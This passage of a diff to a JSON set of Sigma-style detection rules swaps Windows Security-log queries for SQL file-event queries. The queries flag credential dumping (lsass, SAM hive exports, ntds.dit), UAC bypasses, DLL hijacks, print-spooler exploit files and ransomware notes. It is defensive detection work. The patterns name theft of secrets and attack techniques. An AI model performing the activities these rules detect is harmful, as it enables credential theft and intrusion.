"title": "Suspicious Binary Writes Via AnyDesk", + "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", "status": "experimental", - "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", - "author": "Samir Bousseaden", + "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "If source account name is not an admin then its super suspicious" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" ], - "filename": "win_security_account_discovery.yml" + "filename": "file_event_win_anydesk_writing_susp_binaries.yml" }, { - "title": "PowerShell Scripts Installed as Services - Security", - "id": 
"2a926e6a-4b81-4011-8a96-e36cc8c04302", + "title": "Dumpert Process Dumper Default File", + "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\'" ], - "filename": "win_security_powershell_script_installed_as_service.yml" + "filename": "file_event_win_hktl_dumpert.yml" }, { - "title": "Hidden Local User Creation", - "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack", + "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", "status": "test", - "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" + "SELECT * FROM logs 
WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "win_security_hidden_user_creation.yml" + "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" }, { - "title": "Possible Impacket SecretDump Remote Activity", - "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", - "status": "experimental", - "description": "Detect AD credential dumping using impacket secretdump HKTL", - "author": "Samir Bousseaden, wagga", + "title": "UAC Bypass Using IEInstal - File", + "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", + "status": "test", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "win_security_impacket_secretdump.yml" + "filename": "file_event_win_uac_bypass_ieinstal.yml" }, { - "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", - "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", - "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research 
(OTR)", + "title": "ISO File Created Within Temp Folders", + "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", + "status": "experimental", + "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", + "author": "@sam0x90", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unknown" + "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\'))" ], - "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "file_event_win_iso_file_mount.yml" }, { - "title": "Enabled User Right in AD to Control User Objects", - "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", - "status": "test", - "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", - "author": "@neu5ron", + "title": "Creation of an WerFault.exe in Unusual Folder", + "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "status": "experimental", + "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "author": "frack113", "tags": [ "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1574.001" ], 
"falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_alert_active_directory_user_control.yml" + "filename": "file_event_win_werfault_dll_hijacking.yml" }, { - "title": "RDP Login from Localhost", - "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "title": "Typical HiveNightmare SAM File Export", + "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", "status": "test", - "description": "RDP login with localhost source address may be a tunnelled login", - "author": "Thomas Patzke", + "description": "Detects files written by the different tools that exploit HiveNightmare", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "car.2013-07-002", - "attack.t1021.001" + "attack.credential_access", + "attack.t1552.001", + "cve.2021.36934" ], "falsepositives": [ - "Unknown" + "Files that accidentally contain these strings" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\')" ], - "filename": "win_security_rdp_localhost_login.yml" + "filename": 
"file_event_win_hktl_hivenightmare_file_exports.yml" }, { - "title": "Suspicious Computer Account Name Change CVE-2021-42287", - "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", - "status": "test", - "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Startup Folder Persistence", + "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "status": "experimental", + "description": "Detects when a file with a suspicious extension is created in the startup folder", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], "falsepositives": [ - "Unknown" + "Rare legitimate usage of some of the extensions mentioned in the rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" ], - "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" + "filename": "file_event_win_susp_startup_folder_persistence.yml" }, { - "title": "SysKey Registry Keys Access", - "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", - "status": "test", - "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", - "author": 
"Roberto Rodriguez @Cyb3rWard0g", + "title": "UAC Bypass Using IDiagnostic Profile - File", + "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "status": "experimental", + "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_syskey_registry_access.yml" + "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Suspicious Outbound Kerberos Connection - Security", - "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", + "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "status": "experimental", + "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "author": "frack113", "tags": [ - "attack.lateral_movement", - 
"attack.t1558.003" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Web Browsers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" ], - "filename": "win_security_susp_outbound_kerberos_connection.yml" + "filename": "file_event_win_iphlpapi_dll_sideloading.yml" }, { - "title": "Register new Logon Process by Rubeus", - "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", - "status": "test", - "description": "Detects potential use of Rubeus via registered new trusted logon process", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "title": "Legitimate Application Dropped Script", + "id": "7d604714-e071-49ff-8726-edeb95a70679", + "status": "experimental", + "description": "Detects programs on a Windows system that should not write scripts to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE 
'%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" ], - "filename": "win_security_register_new_logon_process_by_rubeus.yml" + "filename": "file_event_win_legitimate_app_dropping_script.yml" }, { - "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", - "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", + "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", + "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", "status": "test", - "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", - "author": "Orlinum , BlueDefenZer", + "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": 
[ + "attack.execution", "attack.privilege_escalation", - "attack.credential_access" + "attack.resource_development", + "attack.t1587", + "cve.2021.1675" ], "falsepositives": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\'" ], - "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" + "filename": "file_event_win_cve_2021_1675_printspooler.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Registry", - "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "title": "Potential Winnti Dropper Activity", + "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + 
"attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\')" ], - "filename": "win_security_dot_net_etw_tamper.yml" + "filename": "file_event_win_redmimicry_winnti_filedrop.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Security", - "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious Creation TXT File in User Desktop", + "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", + "status": "test", + "description": "Ransomware create txt file in the user Desktop", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1486" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND 
TargetFilename LIKE '%.txt' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" + "filename": "file_event_win_susp_desktop_txt.yml" }, { - "title": "Reconnaissance Activity", - "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "title": "UAC Bypass Using NTFS Reparse Point - File", + "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", "status": "test", - "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", - "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1069.002", - "attack.s0039" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Administrator activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" ], - "filename": "win_security_susp_net_recon_activity.yml" + "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "First Time Seen Remote Named Pipe", - "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "title": "Suspicious ADSI-Cache Usage By Unknown Tool", + "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", "status": "test", - "description": "This detection excludes known namped pipes accessible remotely 
and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", - "author": "Samir Bousseaden", + "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" + "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND 
NOT (((NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" ], - "filename": "win_security_lm_namedpipe.yml" + "filename": "file_event_win_susp_adsi_cache_usage.yml" }, { - "title": "Possible PetitPotam Coerce Authentication Attempt", - "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", - "status": "experimental", - "description": "Detect PetitPotam coerced authentication activity.", - "author": "Mauricio Velazco, Michael Haag", + "title": "Suspicious NTDS.DIT Creation", + "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", + "status": "test", + "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1187" + "attack.t1003.003" ], 
